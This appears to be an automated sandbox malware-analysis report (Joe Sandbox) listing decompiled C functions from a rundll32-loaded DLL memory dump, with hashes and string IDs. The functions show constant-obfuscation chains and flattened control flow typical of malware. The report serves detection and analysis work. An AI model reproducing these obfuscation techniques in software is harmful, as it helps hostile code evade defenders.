                                                                        • Instruction Fuzzy Hash: D7516771908341DFD319CE22D94545FBBE1EBC8748F108A1EF586AA260D3B5CA89CF97
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E1001654F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				intOrPtr _v72;
                                                                        				char _v592;
                                                                        				void* _t137;
                                                                        				signed int _t155;
                                                                        				signed int _t156;
                                                                        				signed int _t157;
                                                                        
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t137);
                                                                        				_v68 = _v68 & 0x00000000;
                                                                        				_v72 = 0x40327f;
                                                                        				_v36 = 0xc85d;
                                                                        				_v36 = _v36 ^ 0x66282df1;
                                                                        				_v36 = _v36 << 7;
                                                                        				_v36 = _v36 ^ 0x1472a435;
                                                                        				_v64 = 0xf491;
                                                                        				_v64 = _v64 + 0xa329;
                                                                        				_v64 = _v64 ^ 0x0001adca;
                                                                        				_v40 = 0xc364;
                                                                        				_v40 = _v40 >> 8;
                                                                        				_v40 = _v40 | 0x488121d4;
                                                                        				_v40 = _v40 ^ 0x48816408;
                                                                        				_v52 = 0x6da2;
                                                                        				_v52 = _v52 >> 1;
                                                                        				_v52 = _v52 ^ 0x0000495a;
                                                                        				_v8 = 0x312a;
                                                                        				_v8 = _v8 + 0xffffef42;
                                                                        				_t155 = 0x2c;
                                                                        				_v8 = _v8 * 0x65;
                                                                        				_v8 = _v8 + 0xce6d;
                                                                        				_v8 = _v8 ^ 0x000de244;
                                                                        				_v20 = 0x8561;
                                                                        				_v20 = _v20 | 0x5ebc884e;
                                                                        				_v20 = _v20 + 0x1144;
                                                                        				_v20 = _v20 + 0xfffffd3c;
                                                                        				_v20 = _v20 ^ 0x5ebcfa0f;
                                                                        				_v12 = 0x1c9b;
                                                                        				_v12 = _v12 >> 0x10;
                                                                        				_v12 = _v12 / _t155;
                                                                        				_v12 = _v12 + 0x2960;
                                                                        				_v12 = _v12 ^ 0x00001be2;
                                                                        				_v60 = 0x3552;
                                                                        				_t156 = 0x2b;
                                                                        				_v60 = _v60 / _t156;
                                                                        				_v60 = _v60 ^ 0x00001bfb;
                                                                        				_v24 = 0xfa61;
                                                                        				_v24 = _v24 >> 4;
                                                                        				_v24 = _v24 | 0xfe7fc8bf;
                                                                        				_v24 = _v24 ^ 0xfe7fec18;
                                                                        				_v44 = 0xf8e3;
                                                                        				_t157 = 0x73;
                                                                        				_v44 = _v44 * 0x4c;
                                                                        				_v44 = _v44 ^ 0x0049ee51;
                                                                        				_v16 = 0x71dd;
                                                                        				_v16 = _v16 >> 0xb;
                                                                        				_v16 = _v16 << 0xd;
                                                                        				_v16 = _v16 * 0xd;
                                                                        				_v16 = _v16 ^ 0x0016ae67;
                                                                        				_v56 = 0x9b34;
                                                                        				_v56 = _v56 / _t157;
                                                                        				_v56 = _v56 ^ 0x000036fa;
                                                                        				_v28 = 0xc6c;
                                                                        				_v28 = _v28 + 0xfffffa1a;
                                                                        				_v28 = _v28 + 0xffff7ee3;
                                                                        				_v28 = _v28 ^ 0xffff83ef;
                                                                        				_v48 = 0x101f;
                                                                        				_v48 = _v48 | 0x367cb3d5;
                                                                        				_v48 = _v48 ^ 0x367cc432;
                                                                        				_v32 = 0x8972;
                                                                        				_v32 = _v32 + 0x5a70;
                                                                        				_v32 = _v32 ^ 0x29e9990a;
                                                                        				_v32 = _v32 ^ 0x29e93145;
                                                                        				_push(0x100015f0);
                                                                        				_push(_v40);
                                                                        				E10013D3D(E1001BF25(_v36, _v64, _v32), _v32, _v52, _v8,  &_v592, _v20, _v36, _v12);
                                                                        				E1001C5F7(_v60, _v24, _v44, _v16, _t148);
                                                                        				return E10003CA0(_v56, _v28, _v48,  &_v592, _v32);
                                                                        			}


























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$E1)$QI
                                                                        • API String ID: 0-3224676359
                                                                        • Opcode ID: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
                                                                        • Instruction ID: 4748c6fc59a3130118217356d11503de5a80fd968bd88dd6c5efbc71458b5f5e
                                                                        • Opcode Fuzzy Hash: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
                                                                        • Instruction Fuzzy Hash: 7051DE75D0120DABEF08CFA5D98A8EEBBB2FF04314F208159E415B62A0D7B95A45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E1000213E(intOrPtr* _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				intOrPtr _v56;
                                                                        				void* _t117;
                                                                        				void* _t119;
                                                                        				intOrPtr* _t120;
                                                                        				signed int _t123;
                                                                        				signed int _t124;
                                                                        				signed int _t125;
                                                                        				intOrPtr* _t138;
                                                                        
                                                                        				_v52 = _v52 & 0x00000000;
                                                                        				_v56 = 0x538da4;
                                                                        				_v28 = 0x44a2;
                                                                        				_v28 = _v28 + 0xffff49a8;
                                                                        				_v28 = _v28 ^ 0x9ec4eed9;
                                                                        				_v28 = _v28 ^ 0x613b19df;
                                                                        				_v24 = 0xfb1d;
                                                                        				_v24 = _v24 | 0x73dd884d;
                                                                        				_v24 = _v24 >> 0x10;
                                                                        				_v24 = _v24 ^ 0x000060fc;
                                                                        				_v20 = 0x4538;
                                                                        				_v20 = _v20 << 1;
                                                                        				_v20 = _v20 >> 1;
                                                                        				_v20 = _v20 ^ 0x0000423d;
                                                                        				_v16 = 0x1a69;
                                                                        				_v16 = _v16 + 0x19e4;
                                                                        				_v16 = _v16 << 6;
                                                                        				_t123 = 0x59;
                                                                        				_v16 = _v16 * 0x7f;
                                                                        				_v16 = _v16 ^ 0x067cf58b;
                                                                        				_v12 = 0x7ce6;
                                                                        				_v12 = _v12 | 0x92d22600;
                                                                        				_v12 = _v12 >> 3;
                                                                        				_v12 = _v12 | 0x69c09952;
                                                                        				_v12 = _v12 ^ 0x7bda88d4;
                                                                        				_v8 = 0xdbf1;
                                                                        				_v8 = _v8 >> 2;
                                                                        				_t138 = _a4;
                                                                        				_v8 = _v8 * 0x21;
                                                                        				_t124 = 0x64;
                                                                        				_v8 = _v8 / _t123;
                                                                        				_v8 = _v8 ^ 0x00003399;
                                                                        				_v44 = 0x6316;
                                                                        				_v44 = _v44 / _t124;
                                                                        				_v44 = _v44 ^ 0x000016b9;
                                                                        				_v40 = 0xc759;
                                                                        				_v40 = _v40 << 5;
                                                                        				_v40 = _v40 | 0x59fc130f;
                                                                        				_v40 = _v40 ^ 0x59fcaabc;
                                                                        				_v36 = 0xd1fd;
                                                                        				_t125 = 0x6d;
                                                                        				_v36 = _v36 / _t125;
                                                                        				_v36 = _v36 ^ 0x863f9c53;
                                                                        				_v36 = _v36 ^ 0x863f9a9b;
                                                                        				_v32 = 0x7363;
                                                                        				_v32 = _v32 + 0xffffb442;
                                                                        				_v32 = _v32 + 0xab3e;
                                                                        				_v32 = _v32 ^ 0x0000a443;
                                                                        				_v48 = 0x2890;
                                                                        				_v48 = _v48 * 0x6e;
                                                                        				_v48 = _v48 ^ 0x00113212;
                                                                        				_t117 =  *((intOrPtr*)(_t138 + 0x1c))( *_t138, 1, 0);
                                                                        				_t145 = _t117;
                                                                        				if(_t117 != 0) {
                                                                        					_push(_v20);
                                                                        					_push(_v24);
                                                                        					_t119 = E10012164(0x10001338, _v28, _t145);
                                                                        					_t140 = _t119;
                                                                        					_push(_t119);
                                                                        					_push(_v44);
                                                                        					_push( *_t138);
                                                                        					_push(_v8);
                                                                        					_t120 = E10003892(_v16, _v12);
                                                                        					if(_t120 != 0) {
                                                                        						 *_t120();
                                                                        					}
                                                                        					E1001C5F7(_v40, _v36, _v32, _v48, _t140);
                                                                        				}
                                                                        				return 0;
                                                                        			}
























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =B$cs$|
                                                                        • API String ID: 0-3098575777
                                                                        • Opcode ID: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
                                                                        • Instruction ID: f3f3b864e56cb41531de165bc9f4fd19ac00324e8386bf07003281ad5c508310
                                                                        • Opcode Fuzzy Hash: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
                                                                        • Instruction Fuzzy Hash: 39512371D00209EBEF08CFA1C94A6EEBBB2FB08314F208059D511B6290D7BA5B54CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10005EB9(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				unsigned int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				void* _t95;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t106;
                                                                        				signed int _t107;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t111;
                                                                        				intOrPtr _t120;
                                                                        				intOrPtr* _t121;
                                                                        				void* _t122;
                                                                        				intOrPtr _t123;
                                                                        
                                                                        				_v28 = 0x51db;
                                                                        				_v28 = _v28 * 0x56;
                                                                        				_v28 = _v28 ^ 0xf2cb6318;
                                                                        				_v28 = _v28 ^ 0xf2d01fca;
                                                                        				_v12 = 0x641f;
                                                                        				_t107 = 0x36;
                                                                        				_v12 = _v12 * 0x49;
                                                                        				_v12 = _v12 ^ 0x001cda68;
                                                                        				_v24 = 0xc595;
                                                                        				_v24 = _v24 | 0x40e4949d;
                                                                        				_v24 = _v24 >> 6;
                                                                        				_v24 = _v24 ^ 0x0103f279;
                                                                        				_v36 = 0xae24;
                                                                        				_v36 = _v36 >> 0xe;
                                                                        				_v36 = _v36 << 1;
                                                                        				_v36 = _v36 << 0xe;
                                                                        				_v36 = _v36 ^ 0x0001302d;
                                                                        				_v20 = 0x229b;
                                                                        				_v20 = _v20 | 0xaeee7ef1;
                                                                        				_v20 = _v20 ^ 0xaeee687d;
                                                                        				_v8 = 0x637e;
                                                                        				_v8 = _v8 / _t107;
                                                                        				_v8 = _v8 ^ 0x000003e0;
                                                                        				_v4 = 0xedda;
                                                                        				_v4 = _v4 | 0x32cb1c6d;
                                                                        				_v4 = _v4 ^ 0x32cbfe7d;
                                                                        				_v16 = 0xace9;
                                                                        				_v16 = _v16 * 3;
                                                                        				_v16 = _v16 >> 3;
                                                                        				_v16 = _v16 ^ 0x00006a5d;
                                                                        				_v32 = 0xe450;
                                                                        				_v32 = _v32 | 0xfff2f3f7;
                                                                        				_v32 = _v32 ^ 0x3a9b7228;
                                                                        				_v32 = _v32 ^ 0xc569ebde;
                                                                        				_t95 = E10014237();
                                                                        				_t120 = _a4;
                                                                        				_t122 = _t95;
                                                                        				_v28 = 0x89bb;
                                                                        				_v28 = _v28 ^ 0xf4290def;
                                                                        				_v28 = _v28 + 0xffff042c;
                                                                        				_v28 = _v28 ^ 0xf4288880;
                                                                        				_t124 = _t120 + 0x24;
                                                                        				_t106 = E1001C424(_t120 + 0x24, _v36);
                                                                        				_t97 =  *((intOrPtr*)(_t120 + 8));
                                                                        				if(_t97 != _v28 && _t97 != _t122) {
                                                                        					_t110 =  *((intOrPtr*)(_t120 + 0x18));
                                                                        					if(_t110 != _v28 && _t110 != _t122) {
                                                                        						_t121 = _a8;
                                                                        						_t111 =  *_t121;
                                                                        						if(E10008B2D(_t111, _t106) == 0) {
                                                                        							_push(_t111);
                                                                        							_t123 = E100157E8(0x234);
                                                                        							if(_t123 != 0) {
                                                                        								_t83 = _t123 + 0x2c; // 0x2c
                                                                        								E10015891(_t124, _t83, _v4, _v16, _v32);
                                                                        								 *((intOrPtr*)(_t123 + 0x24)) = _t106;
                                                                        								 *((intOrPtr*)(_t123 + 0x1c)) =  *_t121;
                                                                        								 *_t121 = _t123;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 1;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P$]j$~c
                                                                        • API String ID: 0-2734922740
                                                                        • Opcode ID: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
                                                                        • Instruction ID: ea7cc22da0d58e888ac6ae18cd3838caf37ee5c895773eb993b6b9e4d83255ea
                                                                        • Opcode Fuzzy Hash: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
                                                                        • Instruction Fuzzy Hash: 9B41E2755083429FD358CF21D58641BFBE1FB88798F104A1DF4DAA6264C374EA89CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10008816(intOrPtr* _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				char _v44;
                                                                        				intOrPtr _v48;
                                                                        				char _v52;
                                                                        				char _v116;
                                                                        				void* _t108;
                                                                        				signed int _t117;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				intOrPtr* _t133;
                                                                        
                                                                        				_v28 = 0x78e3;
                                                                        				_v28 = _v28 | 0x7135a14a;
                                                                        				_v28 = _v28 + 0x1554;
                                                                        				_v28 = _v28 ^ 0x7136354d;
                                                                        				_v8 = 0x9c2;
                                                                        				_t117 = 0x5f;
                                                                        				_v8 = _v8 / _t117;
                                                                        				_v8 = _v8 << 9;
                                                                        				_v8 = _v8 ^ 0xd7261730;
                                                                        				_v8 = _v8 ^ 0xd7260392;
                                                                        				_v24 = 0xd04a;
                                                                        				_v24 = _v24 + 0xa8bc;
                                                                        				_v24 = _v24 << 0xf;
                                                                        				_v24 = _v24 ^ 0xbc833dba;
                                                                        				_v40 = 0x60a0;
                                                                        				_v40 = _v40 >> 0xb;
                                                                        				_v40 = _v40 ^ 0x000011f0;
                                                                        				_v32 = 0x3bcc;
                                                                        				_v32 = _v32 >> 3;
                                                                        				_v32 = _v32 << 0xa;
                                                                        				_v32 = _v32 ^ 0x001da571;
                                                                        				_v20 = 0xf201;
                                                                        				_t118 = 0x6a;
                                                                        				_v20 = _v20 / _t118;
                                                                        				_v20 = _v20 | 0xe2b46b61;
                                                                        				_t119 = 0x7b;
                                                                        				_t133 = _a4;
                                                                        				_v20 = _v20 / _t119;
                                                                        				_v20 = _v20 ^ 0x01d7ce84;
                                                                        				_v36 = 0x5b49;
                                                                        				_v36 = _v36 * 0x73;
                                                                        				_v36 = _v36 ^ 0x48cc9d1b;
                                                                        				_v36 = _v36 ^ 0x48e5c7c4;
                                                                        				_v16 = 0xd187;
                                                                        				_v16 = _v16 << 5;
                                                                        				_v16 = _v16 | 0x08003ce7;
                                                                        				_v16 = _v16 + 0xe504;
                                                                        				_v16 = _v16 ^ 0x081b14b1;
                                                                        				_v12 = 0x85bb;
                                                                        				_v12 = _v12 + 0xcd9e;
                                                                        				_v12 = _v12 | 0x9f7708de;
                                                                        				_v12 = _v12 ^ 0x14303fed;
                                                                        				_v12 = _v12 ^ 0x8b4777c9;
                                                                        				_t108 =  *((intOrPtr*)(_t133 + 0x1c))( *_t133, 1, 0);
                                                                        				_t137 = _t108;
                                                                        				if(_t108 != 0) {
                                                                        					E10014E4B( &_v116, _v28, _v8, _v24);
                                                                        					_v52 =  &_v116;
                                                                        					_v48 = E100093FA(_v40, _v32, _t137,  &_v44);
                                                                        					 *((intOrPtr*)(_t133 + 0x1c))( *_t133, 0xa,  &_v52);
                                                                        					E1001C5F7(_v20, _v36, _v16, _v12, _v48);
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: I[$M56q$<
                                                                        • API String ID: 0-676366452
                                                                        • Opcode ID: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
                                                                        • Instruction ID: feb926e86b64a6eeca90413cc5403c2004b8354c474c07f5ba1cecbf70788985
                                                                        • Opcode Fuzzy Hash: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
                                                                        • Instruction Fuzzy Hash: 4241EF75D0020DEBEF08CFA0C94A9EEBBB1FF04304F208159D511B6290D7B95A59DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E10004A2B(void* __ecx) {
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				unsigned int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				void* _t87;
                                                                        				void* _t92;
                                                                        				void* _t94;
                                                                        				void* _t96;
                                                                        				signed int _t102;
                                                                        				void* _t104;
                                                                        				signed int* _t106;
                                                                        
                                                                        				_t106 =  &_v48;
                                                                        				_v16 = 0x385f10;
                                                                        				asm("stosd");
                                                                        				_t94 = __ecx;
                                                                        				_t104 = 0;
                                                                        				_t96 = 0x34518db6;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_v36 = 0xcbb3;
                                                                        				_v36 = _v36 | 0xf42c2371;
                                                                        				_v36 = _v36 ^ 0x43021788;
                                                                        				_v36 = _v36 + 0x4a8d;
                                                                        				_v36 = _v36 ^ 0xb72f589f;
                                                                        				_v40 = 0x92a4;
                                                                        				_t102 = 0x4a;
                                                                        				_v40 = _v40 * 0x57;
                                                                        				_v40 = _v40 << 3;
                                                                        				_v40 = _v40 >> 7;
                                                                        				_v40 = _v40 ^ 0x00036b7d;
                                                                        				_v44 = 0xfc25;
                                                                        				_v44 = _v44 >> 4;
                                                                        				_v44 = _v44 << 2;
                                                                        				_v44 = _v44 | 0xbf219be2;
                                                                        				_v44 = _v44 ^ 0xbf219961;
                                                                        				_v48 = 0xa043;
                                                                        				_v48 = _v48 + 0xffff5a3d;
                                                                        				_v48 = _v48 / _t102;
                                                                        				_v48 = _v48 | 0x078bf529;
                                                                        				_v48 = _v48 ^ 0x07ff8e41;
                                                                        				_v20 = 0x3370;
                                                                        				_v20 = _v20 >> 0xe;
                                                                        				_v20 = _v20 ^ 0x00001c98;
                                                                        				_v24 = 0x4528;
                                                                        				_v24 = _v24 | 0xa2a77225;
                                                                        				_v24 = _v24 ^ 0x1237b29c;
                                                                        				_v24 = _v24 ^ 0xb090e9f5;
                                                                        				_v28 = 0xec9c;
                                                                        				_v28 = _v28 | 0x23d683f6;
                                                                        				_v28 = _v28 >> 0xf;
                                                                        				_v28 = _v28 + 0xffff32f8;
                                                                        				_v28 = _v28 ^ 0xffff48c1;
                                                                        				_v32 = 0x5f5a;
                                                                        				_v32 = _v32 ^ 0xd2da3bda;
                                                                        				_v32 = _v32 + 0xe7f3;
                                                                        				_v32 = _v32 + 0xffff294c;
                                                                        				_v32 = _v32 ^ 0xd2da16fe;
                                                                        				do {
                                                                        					while(_t96 != 0x1bdf2e1f) {
                                                                        						if(_t96 == 0x309c6e61) {
                                                                        							_t92 = E10007E30();
                                                                        							_t106 = _t106 - 0xc + 0xc;
                                                                        							_t96 = 0x1bdf2e1f;
                                                                        							_t104 = _t104 + _t92;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t96 == 0x34518db6) {
                                                                        								_t96 = 0x309c6e61;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        					_t87 = E10007544(_v20, _v24, _v28, _t94 + 4, _v32);
                                                                        					_t106 =  &(_t106[3]);
                                                                        					_t96 = 0x25e8f6f4;
                                                                        					_t104 = _t104 + _t87;
                                                                        					L7:
                                                                        				} while (_t96 != 0x25e8f6f4);
                                                                        				return _t104;
                                                                        			}





















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (E$Z_$p3
                                                                        • API String ID: 0-2346288438
                                                                        • Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
                                                                        • Instruction ID: 7908451ff43d398edfe4d3dd47729a6452d00dfb1cbc6f0b7171fbae9ac85e7f
                                                                        • Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
                                                                        • Instruction Fuzzy Hash: 924147B15083419BE358CE24C54A41FFBE1FBD8798F150E1DF599A6260D7B8CA098B8B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E10014E4B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				unsigned int _v72;
                                                                        				signed int _v76;
                                                                        				void* _t128;
                                                                        				void* _t138;
                                                                        				signed int _t141;
                                                                        				intOrPtr _t143;
                                                                        				signed int _t144;
                                                                        				void* _t147;
                                                                        				intOrPtr* _t148;
                                                                        				void* _t162;
                                                                        				signed int _t163;
                                                                        
                                                                        				_push(_a12);
                                                                        				_t162 = __ecx;
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(0x40);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t128);
                                                                        				_v20 = 0x10;
                                                                        				_v32 = 0xa61f;
                                                                        				_v32 = _v32 + 0xa8ad;
                                                                        				_t144 = 0;
                                                                        				_v32 = _v32 ^ 0x00012e5d;
                                                                        				_t147 = 0x2817a0c8;
                                                                        				_v36 = 0xad73;
                                                                        				_t163 = 0x7d;
                                                                        				_v36 = _v36 * 0x18;
                                                                        				_v36 = _v36 ^ 0x00106704;
                                                                        				_v28 = 0xa63d;
                                                                        				_v28 = _v28 >> 3;
                                                                        				_v28 = _v28 ^ 0x00001262;
                                                                        				_v76 = 0xc830;
                                                                        				_v76 = _v76 + 0xffffcf51;
                                                                        				_v76 = _v76 ^ 0x61a5e6c8;
                                                                        				_v76 = _v76 + 0xffffd3c1;
                                                                        				_v76 = _v76 ^ 0x61a52b9a;
                                                                        				_v60 = 0xaf2b;
                                                                        				_v60 = _v60 + 0xffff794e;
                                                                        				_v60 = _v60 << 9;
                                                                        				_v60 = _v60 ^ 0x0050bd44;
                                                                        				_v72 = 0xd683;
                                                                        				_v72 = _v72 * 0x4e;
                                                                        				_v72 = _v72 >> 7;
                                                                        				_v72 = _v72 + 0x8cf4;
                                                                        				_v72 = _v72 ^ 0x00017a15;
                                                                        				_v48 = 0x2f64;
                                                                        				_v48 = _v48 + 0x8745;
                                                                        				_v48 = _v48 >> 9;
                                                                        				_v48 = _v48 ^ 0x00003344;
                                                                        				_v52 = 0xde80;
                                                                        				_v52 = _v52 >> 8;
                                                                        				_v52 = _v52 + 0xe2ec;
                                                                        				_v52 = _v52 ^ 0x0000cf48;
                                                                        				_v24 = 0x26fb;
                                                                        				_v24 = _v24 ^ 0x99bfc1a1;
                                                                        				_v24 = _v24 ^ 0x99bffb6f;
                                                                        				_v56 = 0x40f3;
                                                                        				_v56 = _v56 << 5;
                                                                        				_v56 = _v56 ^ 0x9a684b3f;
                                                                        				_v56 = _v56 ^ 0x9a60118c;
                                                                        				_v64 = 0xe209;
                                                                        				_v64 = _v64 / _t163;
                                                                        				_v64 = _v64 << 2;
                                                                        				_v64 = _v64 ^ 0xdf73d75b;
                                                                        				_v64 = _v64 ^ 0xdf73ad9f;
                                                                        				_v40 = 0xf4ff;
                                                                        				_v40 = _v40 << 1;
                                                                        				_v40 = _v40 * 0x32;
                                                                        				_v40 = _v40 ^ 0x005fe217;
                                                                        				_v68 = 0xde81;
                                                                        				_v68 = _v68 + 0xc2e0;
                                                                        				_v68 = _v68 << 0xc;
                                                                        				_v68 = _v68 >> 0xc;
                                                                        				_v68 = _v68 ^ 0x0001df05;
                                                                        				_v44 = 0x9d75;
                                                                        				_v44 = _v44 ^ 0xc94ec8c4;
                                                                        				_v44 = _v44 ^ 0xe16feb53;
                                                                        				_v44 = _v44 ^ 0x2821dabf;
                                                                        				do {
                                                                        					while(_t147 != 0x479232b) {
                                                                        						if(_t147 == 0x1eeae304) {
                                                                        							__eflags = E1001C901(_v32,  &_v16,  &_v20, _v36);
                                                                        							if(__eflags != 0) {
                                                                        								_t147 = 0x479232b;
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t147 == 0x264c2085) {
                                                                        								_push(_v60);
                                                                        								_push(_v76);
                                                                        								_t138 = E10012164(0x10001270, _v28, __eflags);
                                                                        								_t141 = E1000DBE9(_v48, __eflags, _v52, _v24, _t162, E10008CA3(__eflags), 0x40,  &_v16, _v56);
                                                                        								__eflags = _t141;
                                                                        								_t126 = _t141 > 0;
                                                                        								__eflags = _t126;
                                                                        								_t144 = 0 | _t126;
                                                                        								E1001C5F7(_v64, _v40, _v68, _v44, _t138);
                                                                        							} else {
                                                                        								if(_t147 != 0x2817a0c8) {
                                                                        									goto L18;
                                                                        								} else {
                                                                        									_t147 = 0x1eeae304;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L21:
                                                                        						return _t144;
                                                                        					}
                                                                        					_t148 =  &_v16;
                                                                        					__eflags = _v16 - _t144;
                                                                        					if(_v16 != _t144) {
                                                                        						do {
                                                                        							_t143 =  *_t148;
                                                                        							__eflags = _t143 - 0x30;
                                                                        							if(_t143 < 0x30) {
                                                                        								L11:
                                                                        								__eflags = _t143 - 0x61;
                                                                        								if(_t143 < 0x61) {
                                                                        									L13:
                                                                        									__eflags = _t143 - 0x41;
                                                                        									if(_t143 < 0x41) {
                                                                        										L15:
                                                                        										 *_t148 = 0x58;
                                                                        									} else {
                                                                        										__eflags = _t143 - 0x5a;
                                                                        										if(_t143 > 0x5a) {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t143 - 0x7a;
                                                                        									if(_t143 > 0x7a) {
                                                                        										goto L13;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t143 - 0x39;
                                                                        								if(_t143 > 0x39) {
                                                                        									goto L11;
                                                                        								}
                                                                        							}
